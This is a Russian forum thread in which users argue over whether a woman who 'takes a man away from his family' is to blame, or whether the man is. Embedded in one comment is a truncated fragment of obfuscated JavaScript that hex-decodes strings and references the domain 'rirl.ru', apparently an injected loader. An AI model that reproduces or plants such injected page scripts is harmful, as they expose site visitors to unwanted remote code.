Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-09 13:41:47 от Гость
Всем доброго времени суток!)) Нужен совет по воспитанию сына. Сыну через 1, 5 месяца исполнится 9 лет. В последнее время все чаще замечаю, что не справляюсь с ним. Он очень изменился. Раньше, в более маленьком возрасте был очень добрым, любознательны ... Подробнее
Последний комментарий
История : Прогулка по жизни
12 минут назад2016-12-09 20:10:47 от Гость
Silvana, "Произведение" - слишком громкое слово. Да, мне, конечно, приятно, но это было так давно..... Гормоны играли и мысли не знали препятствий Все комментарии67630
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Поделись мнением
ШЛЮХА
вчера в 21:42:562016-12-08 21:42:56
Помоги советом
вчера в 21:35:342016-12-08 21:35:34
Комедия
07 декабря в 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
Поделись мнением - Чужая семья
Поделись мнением : Чужая семья     Легко ли женщине после 35 найти себе мужа? У нас в доме живет замечательная женщина, с дочкой 10 лет! Женщина эта симпатичная, приветливая, но без мужа! И вот недавно у нее появился мужчина, высокий красивый. Все были за нее рады, но есть одно но, она его увела с семьи! Там осталось двое мальчиков! Тот мужчина все оставил детям и бывшей и пришел жить к этой женщине! Пара они красивая, но мне как то неприятно стало, что ради своего счастья она так поступила! Вот как вы считаете, нужно ли свое счастье получать такой ценой? Ведь ради мужчин, женщины готовы на все! А недавно у нас на работе произошел подобный случай, девушка симпатичная стройная 35 лет тоже с ребенком, подкатывала к нашему начальнику! Он тоже женат и тоже растаял. Мы все наблюдали за ними, как они закрывались в кабинете и выходили растрепаными и с красными щеками! В общем здесь история закончилась тем, что прибегала его жена и плакала.(Бедняшка подозревала, но их не поймала). И начальник остался с женой. Они живут вместе, вроде все хорошо, хотя у нас, у всего коллектива остался неприятный осадок! Я как женщина, осуждаю таких женщин, будь ты двести раз красавица, но не делайте так, не разбивайте чужие семьи!
64867
Другие Поделись мнением
(45)
@Lelik@
12904 @Lelik@
@Lelik@ offline
Репутация : 14609
Комментариев 159 13
02 июня 12:42:12
2016-06-02 12:42:12

Что знакчит увела из семьи? Он что бычок какй-то , что его можно взять и увести??? или ребенок маленький, которого взяли за руку и повели???? Бред- все мы взрослые люди и сами принимаем решение. И да, откуда такая осведомленность жизнью своей соседки?)

Ответить
Поддерживаю Да9 / Нет0
Allegro
21105 Allegro
allegro offline
Репутация : 141109
Комментариев 1459 11
02 июня 12:44:58
2016-06-02 12:44:58

Это видимо сценарий передачи "пусть говорят"{#}

Ответить
Поддерживаю Да3 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
ника777
21248 ника777
Ника777 offline
Репутация : 116114
Комментариев 2154 3
02 июня 12:46:59
2016-06-02 12:46:59

Полностью согласна с вами, лезть в чужую семью, добиваться своего счастья таким путем, это самое ужасное! Ни стыда, ни совести! Но будьте уверены, бумерангом все вернется ей! Еще никому счастья Бог не дал, когда разбивают чужую семью!

Ответить
Поддерживаю Да4 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Violetta
14552 Violetta
Violetta offline
Репутация : 1249833
Комментариев 8867 0
02 июня 12:51:31
2016-06-02 12:51:31

Я тоже считаю, что он не баран, чтобы его уводили. Мужчина сам принимает решение.

Ответить
Поддерживаю Да11 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 12:58:55
2016-06-02 12:58:55

Автор, а вам то почему так эта тема волнует? эти женщины потом дорого платят по счетам, если вы за всемирную справедливость, то не волнуйтесь. Прочтите хотя бы вчерашнюю историю. В вообще я уже писала жены и любовницы сами плодят таких козликов, а потом сопли на кулак мотают.

Ответить
Поддерживаю Да6 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Bert
20913 Bert
Bert offline
Репутация : 125940
Комментариев 1194 1
02 июня 13:03:36
2016-06-02 13:03:36

Автор, конечно не хорошо уводить кого то из семьи, но если мужчина сам не за хочет ни кто его не уведёт. Я заметил, что в таких случаях винять только женщин. Типа увела какая не порядочная женщина. А как на счёт мужчин? !Взрослый мужчина, который несёт ответственность за свою семью, оставляет её и уходит. Всегда считалось, что мужчины сильный пол, но почему то в этом случае переносим всю вину на женщин. Конечно женщины в этом тоже играют важную роль, но и от мужчины многое чего зависет. Бывают в жизни, что брак сам по себе распался и в семье не осталось не чего, с чем можно ассоциировать брак. Тогда уже не надо кого то от кого то уводить. Так же бывает, что в браке кто то кого то встречает, влюбляется и понимает, что это любовь. Можно сесть спокойно обговорить, как сделать так, чтоб не пострадали дети, которые есть в браке. Всё можно решить без грязи, без измен. Но всё что происходит в семье несут ответственность как женщина, так и мужчина!

Ответить
Поддерживаю Да10 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16177 6
02 июня 13:19:42
2016-06-02 13:19:42

Автор, она его за веревку или под дулом писталета увела? Если ушел, значит он сам хотел, а если бы не хотел, то никто бы его не смог увести. Я не оправдываю этих девушек, зная, что он женат, не должны были они себя так вести, но давайте будем честными, тут главное решение все же принимает мужчина, а не они насильно его уводят.

Ответить
Поддерживаю Да4 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
ника777
21248 ника777
Ника777 offline
Репутация : 116114
Комментариев 2154 3
02 июня 13:29:15
2016-06-02 13:29:15

Читательница , Бывают такие настырные женщины, будут настаивать, чтобы оставил семью, давить на него...

Ответить
Поддерживаю Да2 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 236092
Комментариев 1763 1
02 июня 13:40:02
2016-06-02 13:40:02

Violetta, согласна отчасти. Процентов 80 мужиков наверное подаются соблазну и не смогут устоять перед нагло приставучей, предлагающей себя женщиной, которая прям готова залезть на мужика сама. Поэтому и существует выражение "увела мужика" то есть соблазнила и он повелся. Если б не конкретная особа может он так и был бы примерным семьянином. Но конечно когда женщина вешается на мужика, решение остаётся за мужиком, но повторюсь мало кто откажется от доступного тела. У женщин, как мне кажется, немного выше мораль и принципы.

Ответить
Поддерживаю Да4 / Нет1
Гость
Гость

02 июня 13:44:56
2016-06-02 13:44:56

Соглашусь с многими - действительно он, что баран, что бы его увели? А вообще разве кто-то в праве осуждать или обсуждать ту женщину? Кто-то знает причину почему тот мужчина ушел? Есть пример и не один, когда мужчина уходит из семьи к другой женщине, не факт, что его экс-супруга будет страдать, возможно, она найдет еще лучше мужчину с котторым будет счастливее чем с бывшим мужем!

Ответить
Поддерживаю Да2 / Нет0
Гость
Гость

02 июня 13:46:40
2016-06-02 13:46:40

Dевушк@, отказаться может и не откажется мужчина от женщины которая на него вешается, но уйти из семьи не каждый мужчина уйдет - значит есть на то причины!

Ответить
Поддерживаю Да3 / Нет0
Ulyani4
21258 Ulyani4
Ulyani4 offline
Репутация : 3813
Комментариев 130 2
02 июня 13:48:57
2016-06-02 13:48:57

Как это обычно бывает уведет из семьи женщина мужчину так потом через эдак пару тройку лет у нее уведут. А все дело в том, что мужчина такой, а не какой то там бумеранг. Тип мужчины такой 5-6 раз женятся и западают на молоденьких или более привлекательных, на запретный плод. Далее все хорошо мужчина и женщина строют семью, но этому типу мужчин через несколько лет надоедает уже старая и непривлекательная жена, которую он привык видеть рядом с собой и опять по кругу меняет женщин. Вот как, такой тип мужчин просто и по русски называется "кабель" или от латинского "кабелиниос козлиниус"

Ответить
Поддерживаю Да4 / Нет0
Я люблю пожрать. А пожрать любит меня. Я выйду замуж за пожрать. И у нас родятся маленькие пожратики
Гость
Гость

02 июня 13:49:22
2016-06-02 13:49:22

А вот автору вообще какая разница кто с кем и почему и как живет? Своя жизнь не интересна, надо пообсуждать чужую жизнь?

Ответить
Поддерживаю Да0 / Нет0
Ulyani4
21258 Ulyani4
Ulyani4 offline
Репутация : 3813
Комментариев 130 2
02 июня 13:54:13
2016-06-02 13:54:13

И вообще автор при чем тут бумеранг? Это просто тип мужчины такой, они на самом деле никого не любят кроме себя и ищут себе новое мясо. Ну а женщины которые уводят из семей мужчин не ждите, что у вас будет все гуд, снимите розовые очки и смотрите в правде глаза. Такие женщины обречены на то что их бросят, и это не из за бумеранга а из за того, что мужчине нужно разнообразие и новая игрушка, потому что старая игрушка надоела и не тут любви, со стороны такого мужчины. Просто использование, удобство и страсть не любовь вот и все(

Ответить
Поддерживаю Да1 / Нет0
Я люблю пожрать. А пожрать любит меня. Я выйду замуж за пожрать. И у нас родятся маленькие пожратики
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
02 июня 13:55:57
2016-06-02 13:55:57

Правильно говорят: увести из семьи можно только барана ))))))) без комментариев. Пусть женщины хоть как перед мужчиной хвостом будут вертеть, а если он порядочный муж и семьянин, любящий и ценящий свою семью - не уйдет и даже не подумает , и не променяет ни на какую другую. вот и всё.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да3 / Нет0
Справедливая
Справедливая

02 июня 13:58:12
2016-06-02 13:58:12
Увела-это значит, флиртовала, строила глазки, красивая улыбочка, непринужденно прикосновение и т. д. Это так делала у нас на работе та барышня, которая сама заходила к нему в кабинет и закрывала за собой двери! Вы думаете, мужчина всегда может устоять! Схема одна и та же, женщины вы все знаете, как это делается!
Ответить
Поддерживаю Да0 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
02 июня 13:58:30
2016-06-02 13:58:30

Ulyani4, а откуда такая статистика? Среди моих знакомых, например, мужчины, женившиеся вторично, так и остались в новых семьях. Те же, кто хочет периодически менять женщин, как правило, и вовсе не женятся, - ведь будучи свободным, завести новые отношения намого легче.

Ответить
Поддерживаю Да0 / Нет0
Ulyani4
21258 Ulyani4
Ulyani4 offline
Репутация : 3813
Комментариев 130 2
02 июня 14:07:35
2016-06-02 14:07:35

Farba, есть такой тип мужчин кто женится и по 10 раз. Я вам об одном вы о другом типе мужчин я не говорила о тех кто женится повторно а говорила о тех кто жениться женщин меняя как перчатки. Не факт то что не женятся, сколько есть людей которые по 5-10 раз женятся.

Ответить
Поддерживаю Да0 / Нет0
Я люблю пожрать. А пожрать любит меня. Я выйду замуж за пожрать. И у нас родятся маленькие пожратики
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 14:23:35
2016-06-02 14:23:35

шоколадочка , вот не согласна. Если женщина упорно будет добиваться то самого верного добьет в подходящий момент

Ответить
Поддерживаю Да3 / Нет1
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Осенняя
17330 Осенняя
Осенняя online
Репутация : 402133
Комментариев 2261 2
02 июня 14:58:22
2016-06-02 14:58:22

Да что ж за неделя такая, какая то эпедемия на мужиков, которых уводят из семьи. Что ни история, все мужика куда то ведут. Месяц мужиков-ослов объявляется открытым.

Ответить
Поддерживаю Да5 / Нет0
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 15:03:36
2016-06-02 15:03:36

Осенняя, 😂😁👏 7995;👏🏻㈇ 9;🏻👏🏻

Ответить
Поддерживаю Да0 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
02 июня 15:07:15
2016-06-02 15:07:15

Dead end, если б все было так просто, тут бы не писали любовницы, годами добивающиеся развода своего возлюбленого.

Ответить
Поддерживаю Да0 / Нет0
Осенняя
17330 Осенняя
Осенняя online
Репутация : 402133
Комментариев 2261 2
02 июня 15:14:36
2016-06-02 15:14:36

Так хочется прочитать историю, как любовница приводит обратно к жене мужика еще и денег жене предлагает, чтоб только забрала

Ответить
Поддерживаю Да4 / Нет1
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 15:38:33
2016-06-02 15:38:33

Farba, 😂да флаг в руки. Не жалко ГОДЫ на такое убивать, кто против))) вперед-пох.. те свою жизнь)

Ответить
Поддерживаю Да0 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 15:42:30
2016-06-02 15:42:30

Осенняя, извиние конечно ДА)) я бы и сама заплатила за такое шоу )))

Ответить
Поддерживаю Да0 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Оксана06
13666 Оксана06
Оксана06 offline
Репутация : 80097
Комментариев 608 0
02 июня 16:09:28
2016-06-02 16:09:28

Жизнь не делится на черное и белое. Я не стала бы никого осуждать. Конечно, ничего хорошего здесь нет, но это на первый взгляд, у каждой семьи своя история. Знаю пары, которые ушли из семей, чтобы быть вместе и очень даже счастливы, без всяких бумерангов. И знаю семью, где муж не ушел, выбрал жену и детей, в итоге несчастны все. Жена не может простить измены, муж терпеть не может жену, друг друга они раздражают, по сути чужие люди, хоть и внуки уже есть, а уже взрослые дети много лет смотрят на это и ничем не могут помочь.

Ответить
Поддерживаю Да1 / Нет0
Справедливая
Справедливая

02 июня 16:47:24
2016-06-02 16:47:24
KoZa, я каждый день вижу этих людей! И мне очень жаль тех жен! В данных случаях барышни сами влезли в чужие семьи!
Ответить
Поддерживаю Да0 / Нет0
Справедливая
Справедливая

02 июня 16:47:48
2016-06-02 16:47:48
Ulyani4, я описывала тип нормальных мужчин, просто они поддались соблазну! И женщины здесь приняли определенное участие!
Ответить
Поддерживаю Да0 / Нет0
Олюша
Олюша

02 июня 16:50:26
2016-06-02 16:50:26
Мы познакомились с мужем, когда он был женат. Вскоре он развелся, мы поженились. Никогда не считала себя виноватой в их разводе, муж говорит, что их отношения с бывшей женой на тот момент были на грани, со мной или без меня развод бы был. А кто то считает, что я его "увела". Мы женаты уже больше 5 лет, у нас родилась дочь. Бывшая супруга, конечно, узнав, что сразу после развода, муж живет с другой, какое то время злилась и собирала грязь про нас. А сейчас успокоилась, тоже уже вышла замуж. Так что, тут бабка надвое сказала! Нельзя никого увести из семьи, если она есть!!!
Ответить
Поддерживаю Да0 / Нет0
Ulyani4
21258 Ulyani4
Ulyani4 offline
Репутация : 3813
Комментариев 130 2
02 июня 18:57:23
2016-06-02 18:57:23

Справедливая , нормального мужчину никак не увести из семьи, если мужчина любит свою жену и жена любит своего мужчину, то тут хоть та женщина, которая хочет увести мужчину, голой будет ходить, то у мужчины у которого все в порядке в семье и есть любовь не будет даже на женщину разлучницу смотреть!

Ответить
Поддерживаю Да2 / Нет0
Я люблю пожрать. А пожрать любит меня. Я выйду замуж за пожрать. И у нас родятся маленькие пожратики
Справедливая
Справедливая

02 июня 19:27:45
2016-06-02 19:27:45
Ulyani4, а чего это вы так защищаете разлучниц, у вас тоже наверное есть грешок? Мужчину насильно не увести, а вот соблазнить можна, есть уже пример.
Ответить
Поддерживаю Да0 / Нет0
Xelen
21144 Xelen
Xelen offline
Репутация : 36166
Комментариев 436 1
02 июня 19:36:00
2016-06-02 19:36:00

Если муж ушёл, значит не так то и ценил семью. Обидно, досадно, да ладно! Значит скатертью ему полотенце. Лучше никакого, чем такой.

А вот те женщины, которые вешаются на мужчин, им очень быстро надоедают. Как и расслабившиеся жены. Мужчину надо в тонусе держать, он ведь собственник)) Пусть лучше боится, что жену уведут. Тогда и желание на других баб смотреть отпадет)) Правдой не со всеми такое работает:((((

Ответить
Поддерживаю Да1 / Нет0
Справедливая
Справедливая

02 июня 20:35:32
2016-06-02 20:35:32
Dead end, прикольно, почитала истории, много похожих, и почти в каждой любовницы остаются с"носом". За что боролись, на то и напоролись!
Ответить
Поддерживаю Да0 / Нет0
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 20:57:07
2016-06-02 20:57:07

Справедливая , все таки есть в Мире справедливость 😊

Ответить
Поддерживаю Да0 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 22:06:44
2016-06-02 22:06:44

Ответить
Поддерживаю Да4 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Блондиночка
10883 Блондиночка
Блондиночка online
  • Мисс Остроумие
Репутация : 2899896
Комментариев 17187 30
02 июня 22:38:18
2016-06-02 22:38:18

Конечно я сама противница интрижек с женатыми, в какой-то теме подобных мне охарактеризовали как - неадекватов. =){#}Но в то же время меня забавляет такое выражение как - увела из семьи. Насильно никто никого увести не может. Человек сам сделал свой выбор.

Так же мне не нравится когда во всём обвиняют только любовницу, а мужик кобелина как будто не при чём и вообще не причастен. Будто от него ничего совсем не зависит. Во всём виноваты только разлучницы!

Люди все взрослые, наделены разумом и способностью принимать решение, если мужичонка загулял, то его вина здесь не меньше. Значит он так дорожит своей женой, раз готов по первому зову прыгать в койку с другой. Не насилуют же их в самом деле. =)

А так же, раз он с такой лёгкостью уже предал одну ради другой, что мешает ему предать снова?

Ответить
Поддерживаю Да5 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

02 июня 23:13:33
2016-06-02 23:13:33

Блондиночка , А что нельзя мужика заколдовать? Я знаю случай, один знакомый бросил молодую хорошую жену с маленьким ребёнком и ушёл к одной бабе на 15 лет его старше... И когда я его спросил - ты че охренел , что творишь? Он отвечал- Сам не знаю... что делаю, , просыпаюсь утром к ней отвращение, а вечером опять любовь просыпается....

Мист ика{#}

Ответить
Поддерживаю Да2 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка online
  • Мисс Остроумие
Репутация : 2899896
Комментариев 17187 30
02 июня 23:17:38
2016-06-02 23:17:38

БесШаБаШнЫй ЭлЬф )), по моему он просто оправдывается таким образом. =)Его осуждают и вот он ничего лучше как мистического объяснения, с намёком на приворот, не придумал. =)При этом всю вину на неё переложил. Не виноватый я, она всё это, приворот!=)

Ответить
Поддерживаю Да0 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

02 июня 23:22:22
2016-06-02 23:22:22

Блондиночка , {#} Возможно

Ответить
Поддерживаю Да0 / Нет0
Ulyani4
21258 Ulyani4
Ulyani4 offline
Репутация : 3813
Комментариев 130 2
03 июня 11:23:45
2016-06-03 11:23:45

Справедливая , ахахаха я прям со стула ша упаду, вы в своем уме?) Мне всего 19, какая нафиг разлучница? У меня даж отношений не было, а вы тут говорите не зная меня, что я грешница и увожу мужиков женатиков) Ни кого я не защищаю мне вообще как то все равно, кто там кого уводит, просто высказала объективное мнение на счет этой истории. А вы узко мыслите, выйдите из панцаря и смотрите на все объективнее и не говорите того чего не знаете!

Ответить
Поддерживаю Да0 / Нет0
Я люблю пожрать. А пожрать любит меня. Я выйду замуж за пожрать. И у нас родятся маленькие пожратики
Справедливая
Справедливая

03 июня 15:14:23
2016-06-03 15:14:23
Ulyani4, слишком мало жизненого опыта, чтобы объективно рассуждать! Найдете своего мужчину, смотрите, чтобы никто его у вас не увел. Вот тогда и расскажете или вас плохо любили, или вы неправильно себя вели, или подвернулась другая в нужный момент и пожалела его. Есть много коварных женщин, видели таких, а мужчины ведутся, почему-то. Я хотела просто сказать, ради хорошего мужика. неккоторые женщины готовы на все!
Ответить
Поддерживаю Да0 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 116114
Комментариев 2154 3
03 июня 15:14:49
2016-06-03 15:14:49

Dead end, Хорошо сказано {#} Мужчина, словно садовник, как будешь ухаживать за цветком, в данном случае за женщиной, таким оно и будет...

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Диор
12701 Диор
Диор offline
Репутация : 420775
Комментариев 4864 46
03 июня 18:40:55
2016-06-03 18:40:55

Со стороны всегда легко судить других. Лучше не копайтесь в чужом белье. Если мужчина не хочет, его ни кто не уведет. Значит были причины уйти из семьи. Я скажу больше, не все мужчины готовы бросится в омут головой, уйти. Когда дома ждут, настирано, убрано, ужин готов. Есть и другая сторона медали.

Ответить
Поддерживаю Да1 / Нет0
Ну нельзя нравится всем подряд,нужно же кого-то и раздражать для разнообразия)))
Ulyani4
21258 Ulyani4
Ulyani4 offline
Репутация : 3813
Комментариев 130 2
03 июня 19:58:29
2016-06-03 19:58:29

Справедливая , ну я хотя бы не слежу за чужой жизнью и не сплетнечаю. А вам бы вместо того чтобы следить за чужой жизнью нужно за собой последить и со своей жизнью разобраться. Весь прикол в том, что это вы вместо той бабушки обсуждаете чужую жизнь, а она то тем временем вас не трогает. Еще раз простите повторюсь но если нет любви в семье со стороны обоих, то не проблема увести как мужчину так и женщину. Я уже наблюдала столько ситуаций когда мужчина заводит романы на стороне и изменяют своим женам, вот что хочу сказать в этих семьях нет любви и уважения и как правильно говорили выше мужчина не бычок чтобы его уводить. Женщины разные бывают как и мужчины, ну а я в свою очередь не хочу превращаться в параноика как вы, а хочу жить в любви и в гармонии если у меня будет семья)

Ответить
Поддерживаю Да3 / Нет0
Я люблю пожрать. А пожрать любит меня. Я выйду замуж за пожрать. И у нас родятся маленькие пожратики
Неалина
5436 Неалина
Неалина online
Репутация : 446681
Комментариев 7666 30
06 июня 14:41:32
2016-06-06 14:41:32

С моей точки зрения фраза:"Увела из семьи. "Берется не просто так. Если я не завожу отношений с чужим мужем и он не уходит ради меня из семьи то про меня никто и не скажет, что я кого то увела из семьи.

Если мужчина бы хотел развода то он бы развелся и до нашей с ним скажем встречи. А быть толчком для развода чьего либо я не хочу!

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке